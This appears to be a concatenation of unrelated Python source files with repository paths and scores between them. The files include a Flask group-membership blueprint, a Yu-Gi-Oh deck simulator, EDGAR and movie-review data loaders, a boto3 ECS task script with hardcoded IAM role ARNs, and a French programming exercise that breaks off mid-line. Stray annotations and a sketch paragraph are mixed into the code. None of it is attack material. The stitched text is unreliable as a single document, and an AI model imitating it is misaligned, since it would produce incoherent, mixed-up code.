        flash(f'You successfully left and deleted the AG {ag.name}', 'success')
    # else if there are no mentors left, but still members
    elif not ag.mentors:
        # return an error message;
        # don't save the changes to the database and return to the ag dashboard
        flash(f'You cannot leave an AG, when there is no Mentor left afterwards', 'error')
        return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))
    # else
    else:
        # save a success message
        flash(f'You successfully left the AG {ag.name}', 'success')

    # save the changes to the database and return with the saved success message to the dashboard
    db.session.commit()
    return redirect(url_for('index'))


@bp.route('<ag_name>/kick/<user_name>')
# check that the requester is authenticated/logged in
@requires_auth()
# check that the requester is a mentor of the ag;
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def kick_user(ag_name, user_name, ag, user_ag):
    '''
    kick a user out of an ag

    :param ag_name: name of the ag to kick the user out of
    :param user_name: username of the user to be kicked out

    automatically filled params
    :param user_ag: database entry of the association between the requesting user and the ag
                    --> gets filled by @requires_mentor
    :param ag: database entry of the ag --> gets filled by @requires_mentor

    :return: redirect to the dashboard
    '''
    # query the user and his association
    user = get_user_by_username(user_name)
    edit_user_ag = db.session.query(UserAG).filter_by(user_id=user.id, ag_id=ag.id).scalar()

    # if the user is not an actual member
    if edit_user_ag is None or edit_user_ag.role == 'NONE':
        # return to the ag dashboard with an error message
        flash(f'You cannot kick {user.username} from {ag.display_name}.')
        return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))

    # else:
    # change the association entry, so the user is not a member of the ag anymore
    # and his status is kicked
    edit_user_ag.role = 'NONE'
    edit_user_ag.status = 'KICKED'
    # stage the changes
    db.session.flush()

    # if there are no members left
    if not ag.actual_users:
        # delete the ag and return to the dashboard
        db.session.delete(ag)
        db.session.commit()
        flash(f'You successfully left and deleted the AG {ag.display_name}', 'success')
        return redirect(url_for('index'))
    # else if there are no mentors left
    elif not ag.mentors:
        # save an error message
        flash(f'You cannot kick the last Mentor of {ag.display_name}', 'error')
    # else
    else:
        # save a success message and save the changes to the database
        flash(f'You successfully kicked {user.username} from the AG {ag.display_name}', 'success')
        db.session.commit()

    # return to the ag dashboard
    return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))


@bp.route('<ag_name>/delete')
# check that the requester is authenticated/logged in
@requires_auth()
# check that the requester is a mentor of the ag;
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def delete_ag(ag_name, ag, user_ag):
    '''
    delete an ag

    :param ag_name: name of the ag to be deleted

    automatically filled params
    :param user_ag: database entry of the association between the requesting user and the ag
                    --> gets filled by @requires_mentor
    :param ag: database entry of the ag --> gets filled by @requires_mentor

    :return: redirect to the dashboard
    '''
    # delete the ag
    db.session.delete(ag)
    # save the changes
    db.session.commit()
    # return to the dashboard with a success message
    flash(f'You successfully deleted the AG {ag.display_name}', 'success')
    return redirect(url_for('index'))
2.59375
3
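A hedged client-side sketch against the add_ag endpoint above; the host, port, URL prefix, and authentication are placeholders, since requires_auth() implies a session cookie or token the blueprint itself doesn't show:

import requests

resp = requests.post(
    "http://localhost:5000/api/v1/ag/",   # prefix is an assumption
    data={
        "name": "robotics",
        "display_name": "Robotics AG",
        "description": "We build robots.",
    },
    # a session cookie/token would be needed to pass requires_auth()
)
print(resp.status_code, resp.json())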
invoked_dragoon.py
nisegami/dart-consistency-checker
0
12789859
from typing import List, Optional, Tuple

from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game


class InvokedDragoonManager(Manager):
    # Invoked
    aleister = Card("Aleister the Invoker", CardType.MONSTER)
    invocation = Card("Invocation", CardType.SPELL)
    meltdown = Card("Magical Meltdown", CardType.SPELL)
    terraforming = Card("Terraforming", CardType.SPELL)

    # Extenders
    jester = Card("Jester Confit", CardType.MONSTER)
    souls = Card("Magicians' Souls", CardType.MONSTER)

    # Trickstar Engine
    candina = Card("Trickstar Candina", CardType.MONSTER)
    corobane = Card("Trickstar Corobane", CardType.MONSTER)
    lightstage = Card("Trickstar Lightstage", CardType.SPELL)
    set_rotation = Card("Set Rotation", CardType.SPELL)

    # Draw
    desires = Card("Pot of Desires", CardType.SPELL)
    upstart = Card("Upstart Goblin", CardType.SPELL)

    # Hand Traps
    nibiru = Card("Nibiru, the Primal Being", CardType.MONSTER)
    ash = Card("Ash Blossom & Joyous Spring", CardType.MONSTER)
    ogre = Card("Ghost Ogre & Snow Rabbit", CardType.MONSTER)
    droll = Card("Droll & Lock Bird", CardType.MONSTER)
    veiler = Card("Effect Veiler", CardType.MONSTER)
    gamma = Card("PSY-Framegear Gamma", CardType.MONSTER)
    driver = Card("PSY-Frame Driver", CardType.MONSTER)
    crow = Card("D.D. Crow", CardType.MONSTER)
    belle = Card("Ghost Belle & Haunted Mansion", CardType.MONSTER)
    meister = Card("Skull Meister", CardType.MONSTER)
    imperm = Card("Infinite Impermanence", CardType.TRAP)

    # Dragoons
    dm = Card("Dark Magician", CardType.MONSTER)
    red_eyes = Card("Red-Eyes Black Dragon", CardType.MONSTER)
    ref = Card("Red-Eyes Fusion", CardType.SPELL)
    magicalized_fusion = Card("Magicalized Fusion", CardType.SPELL)

    # Misc
    fleur = Card("<NAME>, the Knighted", CardType.MONSTER)
    droplet = Card("Forbidden Droplet", CardType.SPELL)
    called = Card("Called by the Grave", CardType.SPELL)
    cyclone = Card("Cosmic Cyclone", CardType.SPELL)
    duster = Card("Harpie's Feather Duster", CardType.SPELL)
    mind_control = Card("Mind Control", CardType.SPELL)
    prison = Card("Ice Dragon's Prison", CardType.TRAP)
    judgment = Card("Solemn Judgment", CardType.TRAP)

    # Extra Deck
    carrier = Card("Union Carrier", CardType.EXTRA_DECK)
    almiraj = Card("Salamangreat Almiraj", CardType.EXTRA_DECK)
    gardna = Card("Secure Gardna", CardType.EXTRA_DECK)
    artemis = Card("Artemis, the Magistus Moon Maiden", CardType.EXTRA_DECK)
    mechaba = Card("Invoked Mechaba", CardType.EXTRA_DECK)
    augoeides = Card("Invoked Augoeides", CardType.EXTRA_DECK)
    purgatrio = Card("Invoked Purgatrio", CardType.EXTRA_DECK)
    omega = Card("Psy-framelord Omega", CardType.EXTRA_DECK)
    verte = Card("Predaplant Verte Anaconda", CardType.EXTRA_DECK)
    dragoon = Card("Red-Eyes Dark Dragoon", CardType.EXTRA_DECK)

    # Disruptions
    disr_dragoon = Disruption(repr(dragoon), 8)
    disr_mechaba_m = Disruption(f"{repr(mechaba)} (M)", 2)
    disr_mechaba_s = Disruption(f"{repr(mechaba)} (S)", 0)
    disr_mechaba_t = Disruption(f"{repr(mechaba)} (T)", 0)
    disr_prison = Disruption(repr(prison), 2)
    disr_judgment = Disruption(repr(judgment), 2)
    disr_aleister = Disruption(repr(aleister), 1)

    # Lists
    hand_traps = (ash, ogre, veiler, imperm, nibiru, droll, crow, belle, meister, gamma)
    protection = (belle, called)
    cards_to_set = (judgment, droplet, called, imperm, prison, cyclone)
    discards = (driver, duster, mind_control, upstart, cyclone)
    light_monsters = (corobane, candina, artemis, gardna, fleur)
    not_opt = (imperm, crow, meister, veiler, cyclone)
    going_second = (duster, mind_control)
    verte_materials = (
        aleister,
        candina,
        corobane,
        souls,
        jester,
        fleur,
    )  # artemis, almiraj, gardna?

    standard_decklist = DeckList(
        (
            (aleister, 3),
            (invocation, 2),
            (meltdown, 3),
            (terraforming, 1),
            (prison, 2),
            (imperm, 3),
            (ash, 3),
            (souls, 3),
            (dm, 2),
            # (fleur, 1),
            (red_eyes, 2),
            (ref, 3),
            (magicalized_fusion, 1),
            (candina, 1),
            (corobane, 1),
            (lightstage, 1),
            # (upstart, 1),
            (cyclone, 2),
            (judgment, 2),
            (upstart, 1),
            (duster, 1),
            (mind_control, 1),
            (set_rotation, 1),
            (called, 1),
        ),
        (
            (almiraj, 1),
            (artemis, 1),
            (gardna, 1),
            (mechaba, 2),
            (purgatrio, 1),
            (augoeides, 1),
            (omega, 1),
            (dragoon, 2),
            (verte, 2),
        ),
    )

    default_decklist = standard_decklist

    #########
    # Helpers
    #########

    @classmethod
    def generate_stats(cls, end_games: List[Game]) -> List[List[str]]:
        return [
            ["Dragoon", cls.percent_with_flags(end_games, ["dragoon"])],
            ["Mechaba", cls.percent_with_flags(end_games, ["mechaba"])],
            ["Both", cls.percent_with_flags(end_games, ["dragoon", "mechaba"])],
            ["3+ Disruptions", cls.percent_with_flags(end_games, ["3+ disruptions"])],
            ["Bricks", cls.percent_with_flags(end_games, ["brick"])],
        ]

    def postprocess(self, game: Game):
        return game

    def endphase(self, game: Game):
        for card in game.hand.cards[:]:  # make a copy so we can modify hand
            if card in self.cards_to_set:
                game.move(game.hand, game.backrow, card)

        # Process Disruptions
        pure_disruptions = 0

        if self.dragoon in game.monsters and len(game.hand):
            game.add_flag("dragoon")
            game.disruptions.add(self.disr_dragoon)
            pure_disruptions += 1

        if self.mechaba in game.monsters:
            for card in game.hand:
                game.add_flag("mechaba")
                if card.card_type == CardType.MONSTER:
                    game.disruptions.add(self.disr_mechaba_m)
                elif card.card_type == CardType.SPELL:
                    game.disruptions.add(self.disr_mechaba_s)
                elif card.card_type == CardType.TRAP:
                    game.disruptions.add(self.disr_mechaba_t)
            if game.has_flag("mechaba"):
                pure_disruptions += 1

        for card in game.hand:
            if card in self.hand_traps:
                if card == self.gamma and self.driver in game.banished:
                    continue
                if card == self.imperm:
                    continue
                pure_disruptions += 1
                game.disruptions.add(Disruption(repr(card), 1))

        for card in game.backrow:
            if card in self.cards_to_set:
                pure_disruptions += 1
                if card == self.prison:
                    game.disruptions.add(self.disr_prison)
                elif card == self.judgment:
                    game.disruptions.add(self.disr_judgment)
                else:
                    game.disruptions.add(Disruption(repr(card), 1))

        if pure_disruptions >= 3:
            game.add_flag("3+ disruptions")
        if pure_disruptions < 3 and not game.has_flag("dragoon"):
            game.add_flag("brick")

        return game

    def get_redundant_cards_in_hand(self, game: Game, include_useful: bool = False) -> List[Card]:
        redundant_cards = {}  # higher value means more redundant
        hand = game.hand.cards[:]

        for card in hand:
            # the original read `if count := hand.count(card) == 1`, which binds
            # `count` to the *comparison* result; the parentheses fix the precedence
            if (count := hand.count(card)) == 1:
                if game.hopt_available(card):
                    redundant_cards[card] = 0
                else:
                    redundant_cards[card] = 2
            elif count == 2:
                if card in self.not_opt:
                    redundant_cards[card] = 1
                else:
                    redundant_cards[card] = 2
            else:
                redundant_cards[card] = 3

        to_return = sorted(redundant_cards.keys(), key=lambda x: redundant_cards[x], reverse=True)

        if include_useful:
            return to_return
        else:
            return [card for card in to_return if redundant_cards[card] > 1]

    def find_dragoons_materials(self, game: Game) -> Tuple[Optional[CardGroup], Optional[CardGroup]]:
        dm_location, red_eyes_location = None, None

        if self.dm in game.deck:
            dm_location = game.deck
        elif self.dm in game.hand:
            dm_location = game.hand

        if self.red_eyes in game.deck:
            red_eyes_location = game.deck
        elif self.red_eyes in game.hand:
            red_eyes_location = game.hand

        return dm_location, red_eyes_location

    #########
    # Selects
    #########

    def select_invocation_banish_from_grave(self, game: Game) -> Optional[Card]:
        return game.grave.get_any(self.light_monsters)

    def select_invocation_banish_from_field(self, game: Game) -> Optional[Card]:
        return game.monsters.get_any(self.light_monsters)

    def select_souls_dump(self, game: Game) -> Optional[Card]:
        if self.dm in game.deck:
            return self.dm
        else:
            return None

    def select_souls_fodder(self, game: Game, count: int) -> List[Card]:
        fodder = []
        cards = self.get_redundant_cards_in_hand(game, include_useful=False)
        while cards and len(fodder) < count:
            card = cards.pop()
            if card.card_type in [CardType.SPELL, CardType.TRAP]:
                fodder.append(card)
        return fodder

    def select_terraforming_target(self, game: Game) -> Optional[Card]:
        if (
            self.meltdown in game.deck
            and game.hopt_available(self.meltdown)
            and self.meltdown not in game.hand
            and self.aleister not in game.hand
        ):
            return self.meltdown
        elif (
            self.lightstage in game.deck
            and self.lightstage not in game.hand
            and not (self.corobane in game.hand and self.candina in game.hand)
        ):
            return self.lightstage
        elif self.meltdown in game.deck:
            return self.meltdown
        elif self.lightstage in game.deck:
            return self.lightstage
        else:
            return None

    def select_set_rotation_targets(self, game: Game) -> Tuple[Optional[Card], Optional[Card]]:
        # the original annotated this as List[Card], but it returns a pair
        my_card, opp_card = None, None
        if self.meltdown in game.hand or self.aleister in game.hand:
            # we have a path to aleister. give them meltdown and take stage for corobane
            if self.lightstage in game.deck:
                my_card = self.lightstage
            if self.meltdown in game.deck:
                opp_card = self.meltdown
        else:
            if self.meltdown in game.deck:
                my_card = self.meltdown
            if self.lightstage in game.deck:
                opp_card = self.lightstage
        return my_card, opp_card

    #########
    # Actions
    #########

    def action_use_upstart(self, game: Game) -> Optional[Game]:
        if self.upstart in game.hand and len(game.deck) > 1:
            game.move(game.hand, game.grave, self.upstart)
            game.draw()
            return game

    def action_use_terraforming(self, game: Game) -> Optional[Game]:
        if self.terraforming in game.hand and game.hopt_available(self.terraforming):
            target = self.select_terraforming_target(game)
            if not target:
                return None
            game.move(game.hand, game.grave, self.terraforming)
            game.move(game.deck, game.hand, target)
            game.use_hopt(self.terraforming)
            return game

    def action_use_set_rotation(self, game: Game) -> Optional[Game]:
        if self.set_rotation in game.hand:
            my_card, opp_card = self.select_set_rotation_targets(game)
            if not (my_card and opp_card):
                return None
            else:
                game.use_resource("activate field spell")
                game.move(game.hand, game.grave, self.set_rotation)
                game.move(game.deck, game.backrow, my_card)
                game.deck.cards.remove(opp_card)
                return game

    def action_use_meltdown(self, game: Game) -> Optional[Game]:
        if (
            self.meltdown in game.hand
            and game.hopt_available(self.meltdown)
            and game.resource_available("activate field spell")
        ):
            game.move(game.hand, game.backrow, self.meltdown)
            game.use_hopt(self.meltdown)
            if self.aleister in game.deck:
                game.move(game.deck, game.hand, self.aleister)
            return game

    def action_summon_aleister(self, game: Game) -> Optional[Game]:
        if (
            self.aleister in game.hand
            and game.resource_available("normal summon")
            and game.resource_available("summon")
        ):
            game.move(game.hand, game.monsters, self.aleister)
            game.use_resource("normal summon")
            if self.invocation in game.deck:
                game.move(game.deck, game.hand, self.invocation)
                game.use_hopt(self.aleister)
            return game

    def action_summon_artemis(self, game: Game) -> Optional[Game]:
        if self.artemis in game.extra_deck and game.resource_available("summon"):
            if self.aleister in game.monsters:
                game.move(game.monsters, game.grave, self.aleister)
            elif self.jester in game.monsters:
                game.move(game.monsters, game.grave, self.jester)
            elif self.souls in game.monsters:
                game.move(game.monsters, game.grave, self.souls)
            else:
                return None
            game.move(game.extra_deck, game.monsters, self.artemis)
            return game

    def action_summon_almiraj(self, game: Game) -> Optional[Game]:
        if (
            self.almiraj in game.extra_deck
            and self.aleister in game.monsters
            and game.resource_available("summon")
        ):
            game.move(game.monsters, game.grave, self.aleister)
            game.move(game.extra_deck, game.monsters, self.almiraj)
            return game

    def action_summon_gardna(self, game: Game) -> Optional[Game]:
        if (
            self.gardna in game.extra_deck
            and self.almiraj in game.monsters
            and game.resource_available("summon")
        ):
            game.move(game.monsters, game.grave, self.almiraj)
            game.move(game.extra_deck, game.monsters, self.gardna)
            return game

    def action_summon_souls(self, game: Game) -> Optional[Game]:
        if (
            self.souls in game.hand
            and game.hopt_available(self.souls, "summon")
            and game.resource_available("summon")
        ):
            dump_target = self.select_souls_dump(game)
            if not dump_target:
                return None
            game.move(game.deck, game.grave, dump_target)
            game.move(game.hand, game.monsters, self.souls)
            game.use_hopt(self.souls, "summon")
            return game

    def action_normal_summon_souls(self, game: Game) -> Optional[Game]:
        if (
            self.souls in game.hand
            and game.resource_available("normal summon")
            and game.resource_available("summon")
        ):
            game.use_resource("normal summon")
            game.move(game.hand, game.monsters, self.souls)
            return game

    def action_use_souls(self, game: Game) -> Optional[Game]:
        if self.souls in game.monsters and game.hopt_available(self.souls, "draw"):
            game.use_hopt(self.souls, "draw")
            if self.meltdown in game.backrow:
                game.move(game.backrow, game.grave, self.meltdown)
                game.draw()
                fodder = self.select_souls_fodder(game, 1)
                if fodder:
                    game.move(game.hand, game.grave, fodder[0])
                    game.draw()
            else:
                fodder = self.select_souls_fodder(game, 2)
                if not fodder:
                    return None
                while fodder:
                    game.move(game.hand, game.grave, fodder.pop())
                    game.draw()
            return game

    def action_summon_jester(self, game: Game) -> Optional[Game]:
        if (
            self.jester in game.hand
            and game.hopt_available(self.jester)
            and game.resource_available("summon")
        ):
            game.move(game.hand, game.monsters, self.jester)
            game.use_hopt(self.jester)
            return game

    def action_normal_summon_jester(self, game: Game) -> Optional[Game]:
        if (
            self.jester in game.hand
            and game.resource_available("normal summon")
            and game.resource_available("summon")
        ):
            game.use_resource("normal summon")
            game.move(game.hand, game.monsters, self.jester)
            return game

    def action_summon_corobane(self, game: Game) -> Optional[Game]:
        if (
            self.corobane in game.hand
            and game.hopt_available(self.corobane)
            and not game.monsters.cards
            and game.resource_available("summon")
        ):
            game.move(game.hand, game.monsters, self.corobane)
            game.use_hopt(self.corobane)
            return game

    def action_normal_summon_candina(self, game: Game) -> Optional[Game]:
        if (
            self.candina in game.hand
            and game.resource_available("normal summon")
            and game.resource_available("summon")
        ):
            game.use_resource("normal summon")
            game.move(game.hand, game.monsters, self.candina)
            if self.lightstage in game.deck:
                game.move(game.deck, game.hand, self.lightstage)
            elif self.corobane in game.deck:
                game.move(game.deck, game.hand, self.corobane)
            return game

    def action_use_lightstage(self, game: Game) -> Optional[Game]:
        if (
            self.lightstage in game.hand
            and any(card in game.deck for card in [self.corobane, self.candina])
            and game.resource_available("activate field spell")
        ):
            if self.meltdown in game.hand or self.aleister in game.hand:
                game.move(game.hand, game.backrow, self.lightstage)
                # search corobane, aleister will be normal summoned
                if self.corobane in game.deck:
                    game.move(game.deck, game.hand, self.corobane)
                elif self.candina in game.deck:
                    game.move(game.deck, game.hand, self.candina)
                return game
            else:
                game.move(game.hand, game.backrow, self.lightstage)
                # search candina to normal summon
                if self.candina in game.deck:
                    game.move(game.deck, game.hand, self.candina)
                elif self.corobane in game.deck:
                    game.move(game.deck, game.hand, self.corobane)
                return game

    def action_summon_mechaba(self, game: Game) -> Optional[Game]:
        if (
            self.invocation in game.hand
            and self.mechaba in game.extra_deck
            and game.resource_available("summon")
        ):
            if self.aleister in game.grave:
                game.move(game.grave, game.banished, self.aleister)
            elif self.aleister in game.monsters:
                game.move(game.monsters, game.banished, self.aleister)
            else:
                return None

            if grave_target := self.select_invocation_banish_from_grave(game):
                game.move(game.grave, game.banished, grave_target)
            elif field_target := self.select_invocation_banish_from_field(game):
                game.move(game.monsters, game.banished, field_target)
            else:
                return None

            game.move(game.hand, game.grave, self.invocation)
            game.move(game.extra_deck, game.monsters, self.mechaba)

            if game.hopt_available(self.invocation, "recycle"):
                game.use_hopt(self.invocation, "recycle")
                game.move(game.grave, game.deck, self.invocation)
                game.move(game.banished, game.hand, self.aleister)
                game.deck.shuffle()

            return game

    def action_summon_verte(self, game: Game) -> Optional[Game]:
        if self.verte in game.extra_deck and game.resource_available("summon"):
            materials = []
            monsters = game.monsters.cards[:]
            while len(materials) < 2 and monsters:
                card = monsters.pop()
                if card in self.verte_materials:
                    materials.append(card)
            if len(materials) < 2:
                return None
            for material in materials:
                game.move(game.monsters, game.grave, material)
            game.move(game.extra_deck, game.monsters, self.verte)
            return game

    def action_use_verte(self, game: Game) -> Optional[Game]:
        if (
            self.verte in game.monsters
            and game.hopt_available(self.verte)
            and self.ref in game.deck
            and self.dragoon in game.extra_deck
        ):
            dm_location, red_eyes_location = self.find_dragoons_materials(game)
            if not (dm_location and red_eyes_location):
                return None
            game.use_hopt(self.verte)
            game.move(game.deck, game.grave, self.ref)
            game.move(dm_location, game.grave, self.dm)
            game.move(red_eyes_location, game.grave, self.red_eyes)
            game.move(game.extra_deck, game.monsters, self.dragoon)
            game.use_resource("summon")
            return game

    def action_use_ref(self, game: Game) -> Optional[Game]:
        if (
            self.ref in game.hand
            and self.dragoon in game.extra_deck
            and not game.monsters.cards
        ):
            dm_location, red_eyes_location = self.find_dragoons_materials(game)
            if not (dm_location and red_eyes_location):
                return None
            game.move(game.hand, game.grave, self.ref)
            game.move(dm_location, game.grave, self.dm)
            game.move(red_eyes_location, game.grave, self.red_eyes)
            game.move(game.extra_deck, game.monsters, self.dragoon)
            game.use_resource("summon")
            return game

    def action_summon_fleur(self, game: Game) -> Optional[Game]:
        if (
            self.fleur in game.hand
            and game.resource_available("summon")
            and any(card.card_type == CardType.EXTRA_DECK for card in game.monsters)
        ):
            game.move(game.hand, game.monsters, self.fleur)
            return game
2.375
2
py/g1/messaging/g1/messaging/parts/inprocs.py
clchiou/garage
3
12789860
from g1.bases import labels

from ..reqrep import inprocs

SERVER_LABEL_NAMES = (
    # Input.
    'server',
)


def define_server(module_path=None):
    module_path = module_path or inprocs.__name__
    module_labels = labels.make_labels(module_path, *SERVER_LABEL_NAMES)
    setup_server(module_labels)
    return module_labels


def setup_server(module_labels):
    del module_labels  # Unused.
1.90625
2
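A hedged usage sketch for define_server() above; the exact attributes and string form of the returned labels depend on g1.bases.labels.make_labels, so treat this as an assumption rather than documented behavior:

from g1.messaging.parts import inprocs as inproc_parts

SERVER_LABELS = inproc_parts.define_server()
print(SERVER_LABELS.server)  # presumably something like "g1.messaging.reqrep.inprocs:server"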
src/data.py
szarta/stars-reborn
0
12789861
""" data.py Contains and owns the loading and in-memory storage of all of the pre-defined game data. :author: <NAME> :license: MIT, see LICENSE.txt for more details. """ import json import jsonpickle import gzip Technologies = {} Language_Map = {} def load_language_map(filepath): f = open(filepath, "r") Language_Map.update(json.load(f)) f.close() def load_technologies(filepath): f = gzip.open(filepath, "rb") contents = f.read() f.close() Technologies.update(jsonpickle.decode(contents, keys=True)) def load_tutorial_game(tutorial_filepath): f = gzip.open(tutorial_filepath, "rb") contents = f.read() f.close() game = jsonpickle.decode(contents, keys=True) return game
2.59375
3
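A round-trip sketch of the gzip + jsonpickle persistence scheme the loaders above rely on; the dict stands in for the real saved game state, and the file name is illustrative:

import gzip

import jsonpickle

state = {"turn": 1, "players": ["human", "ai"]}
with gzip.open("tutorial.game", "wb") as f:
    f.write(jsonpickle.encode(state, keys=True).encode("utf-8"))

with gzip.open("tutorial.game", "rb") as f:
    restored = jsonpickle.decode(f.read(), keys=True)
print(restored)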
mlxtend/mlxtend/_base/__init__.py
WhiteWolf21/fp-growth
0
12789862
# <NAME> 2014-2020
# mlxtend Machine Learning Library Extensions
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause

from ._base_model import _BaseModel
from ._cluster import _Cluster
from ._classifier import _Classifier
from ._regressor import _Regressor
from ._iterative_model import _IterativeModel
from ._multiclass import _MultiClass
from ._multilayer import _MultiLayer

__all__ = ["_BaseModel", "_Cluster", "_Classifier", "_Regressor",
           "_IterativeModel", "_MultiClass", "_MultiLayer"]
1.039063
1
apps/challenge/resources.py
mehrbodjavadi79/AIC21-Backend
3
12789863
from django.conf import settings
from import_export import resources, fields

from .models import Match


class MatchResource(resources.ModelResource):
    team1 = fields.Field(attribute='team1__name', column_name='team1')
    team2 = fields.Field(attribute='team2__name', column_name='team2')
    winner = fields.Field(attribute='winner__name', column_name='winner')
    game_log = fields.Field()
    server_log = fields.Field()
    visualizer_url = fields.Field()

    class Meta:
        model = Match
        fields = ('team1', 'team2', 'winner', 'infra_token',
                  'game_log', 'server_log', 'visualizer_url')

    def dehydrate_game_log(self, obj: Match):
        return obj.game_log

    def dehydrate_server_log(self, obj: Match):
        return obj.server_log

    def dehydrate_visualizer_url(self, obj: Match):
        return f'{settings.VISUALIZER_URL}{obj.game_log}'
2.1875
2
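A short sketch of exporting matches to CSV with the resource above; export() returns a tablib Dataset, whose .csv property serializes it (standard django-import-export usage, shown outside any view for brevity):

from apps.challenge.resources import MatchResource

dataset = MatchResource().export()  # queries all Match rows by default
with open("matches.csv", "w") as f:
    f.write(dataset.csv)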
dataset/index_file_by_accession.py
fubiye/edgar-abs-kg
0
12789864
import os
import json

BASE_DIR = r'D:\data\edgar\sampling\Archives\edgar\data'

if __name__ == '__main__':
    index = dict()
    for cik in os.listdir(BASE_DIR):
        for accession in os.listdir(os.path.join(BASE_DIR, cik)):
            for fileName in os.listdir(os.path.join(BASE_DIR, cik, accession)):
                index[accession] = {
                    "cik": cik,
                    "accession": accession,
                    "fileName": fileName
                }
    with open('index_by_accession.json', 'w') as index_json:
        json.dump(index, index_json)
2.609375
3
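A lookup sketch against the index file written above; the accession number is a placeholder:

import json

with open('index_by_accession.json') as f:
    index = json.load(f)

entry = index.get("0001234567-21-000001")  # hypothetical accession number
if entry:
    print(entry["cik"], entry["fileName"])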
area51/apps.py
tailorv/neighbourshood
0
12789865
from django.apps import AppConfig


class HoodappConfig(AppConfig):
    name = 'area51'

    def ready(self):
        import area51.signals
1.390625
1
model/load_data.py
Seraphyx/senti
0
12789866
import csv

import sklearn
from sklearn.datasets import load_files

data_path = "../data/raw/movie_reviews"


class data(object):

    def __init__(self, file=None, dataset=None):
        self.file = file
        self.dataset = dataset
        self.read_dataset()

    def read_tsv(self):
        # Python 3's csv module wants text mode (the original opened 'rb'),
        # and the original `for i, row in iter(tsvin)` raised a TypeError;
        # enumerate() supplies the row index.
        with open(self.file, 'r', newline='') as tsvfile:
            tsvin = csv.reader(tsvfile, delimiter='\t')
            for i, row in enumerate(tsvin):
                print(row)
                if i > 10:
                    break
            self.data = tsvin

    def read_acllmdb(self):
        # Movie review Sentiment: http://www.nltk.org/nltk_data/
        movie_train = load_files(data_path, shuffle=True)
        self.data = {
            'x': [x.decode("utf-8") for x in movie_train.data],
            'y': movie_train.target
        }

    def read_dataset(self):
        # Toy datasets are set here
        if self.dataset == 'acllmdb':
            self.read_acllmdb()
        elif self.dataset == 'tsv':
            self.read_tsv()
        else:
            print("No dataset provided.")


class DataBatch(object):

    def __init__(self, path, data):
        self.path = path
        self.data = data


if __name__ == '__main__':
    movie_train = data(dataset='acllmdb')
    print(type(movie_train.data))
    print(len(movie_train.data['x']))
    print(len(movie_train.data['y']))

    # print(movie_train.keys())
    # print(movie_train.DESCR)
    # print(movie_train.filenames)
    # print(movie_train.data[0:3])
    # ds = Dataset(data.data['x'], data.data['y']).load('../data/dataset/dataset_example')

    # import numpy as np
    # doc_zeros = np.zeros(100)
    # print(doc_zeros.shape)
    # test = np.array([1, 2, 3, 4])
    # print(test, test.shape)
    # doc_zeros[:test.size] = test
    # print(doc_zeros, doc_zeros.shape, test.size)
3.09375
3
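A hedged sketch of turning the loaded reviews into a vectorized train/test split with scikit-learn; it assumes the movie_reviews folder layout under data_path that read_acllmdb() expects:

from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split

movie = data(dataset='acllmdb')
x_train, x_test, y_train, y_test = train_test_split(
    movie.data['x'], movie.data['y'], test_size=0.2, random_state=0)
vectors = CountVectorizer().fit_transform(x_train)  # bag-of-words features
print(vectors.shape)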
docker/app/boto-ecs.py
094459/blogpost-airflow-hybrid
1
12789867
import boto3
import json

# Thanks to https://hands-on.cloud/working-with-ecs-in-python-using-boto3/ for a good cheatsheet

client = boto3.client("ecs", region_name="eu-west-2")

## create a new task in ecs
response = client.register_task_definition(
    containerDefinitions=[
        {
            "name": "airflow-hybrid-boto3",
            "image": "public.ecr.aws/a4b5h6u6/beachgeek:latest",
            "cpu": 0,
            "portMappings": [],
            "essential": True,
            "environment": [],
            "mountPoints": [],
            "volumesFrom": [],
            "command": ["ricsue-airflow-hybrid", "period1/temp.csv",
                        "select * from customers WHERE location = \"China\"",
                        "rds-airflow-hybrid", "eu-west-2"],
            "logConfiguration": {
                "logDriver": "awslogs",
                "options": {
                    "awslogs-group": "/ecs/test-external",
                    "awslogs-region": "eu-west-2",
                    "awslogs-stream-prefix": "ecs"
                }
            }
        }
    ],
    taskRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole",
    # taskDefinitionArn="arn:aws:ecs:eu-west-2:704533066374:task-definition/test-external:5",
    executionRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole",
    family="test-external",
    networkMode="bridge",
    requiresCompatibilities=["EXTERNAL"],
    cpu="256",
    memory="512")

print(json.dumps(response, indent=4, default=str))

# it will automatically use the latest version;
# ideally you do not want this as it might impact idempotency,
# so configure an explicit version
new_taskdef = json.dumps(response['taskDefinition']['revision'], indent=4, default=str)
print("TaskDef is now at: " + str(new_taskdef))

# run task
# explicitly set taskdef
response2 = client.run_task(
    cluster='test-hybrid',
    count=1,
    launchType='EXTERNAL',
    taskDefinition='test-external:{taskdef}'.format(taskdef=new_taskdef)
)
print(json.dumps(response2, indent=4, default=str))
2.515625
3
exos/isn/ds1.py
ewen-lbh/school-stuff
0
12789868
x = 237 a = int(x / 100) x = x - 100 * a b = int(x / 10) x = x - 10 * b c = x Resultat = a + b * 10 + c * 100 print(Resultat) # >>> 732 L = [12, 8, 19, 7, 3, 10] Resultat = [20 - L[i] for i in range(len(L))] print(Resultat) ## >>> [8, 12, 1, 13, 17, 10] Resultat = 0 for i in range(5): Resultat += i + 1 print(Resultat) ## >>> 15 L = [i for i in range(10)] for i in range(len(L)): if i >= 1: L[i] = L[i] + L[i - 1] Resultat = L print(Resultat) ## >>> [0, 1, 3, 6, 10, 15, 21, 28, 36, 45] Val, i = 0, 0 L = [7, 14, 21, 45, 52, 67, 89, 99] while Val <= 50: i += 1 Val = L[i] Resultat = [i, Val] print(Resultat) ## >>> [4, 52] Somme = 0 n = 10 for i in range(n): # the colon was missing Somme += i # the indentation was wrong print(Somme) # the capital S in Somme was missing ## >>>> 45 from math import pi Rayon = float(input("Rayon [m] ? > ")) # the "" around the prompt were missing Aire = pi * Rayon ** 2 # exponentiation is written **, not ^ Perimetre = 2 * pi * Rayon # the capital R in Rayon was missing print(f"Aire: {Aire}, Périmètre: {Perimetre}") # f-strings! # Rayon [m] ? > 45 # >>> Aire: 6361.725123519331, Périmètre: 282.7433388230814 import random n = 10000 L = [random.randint(0, 1000) for i in range(n)] a = 0 b = 0 c = 0 for i in range(len(L)): if L[i] < 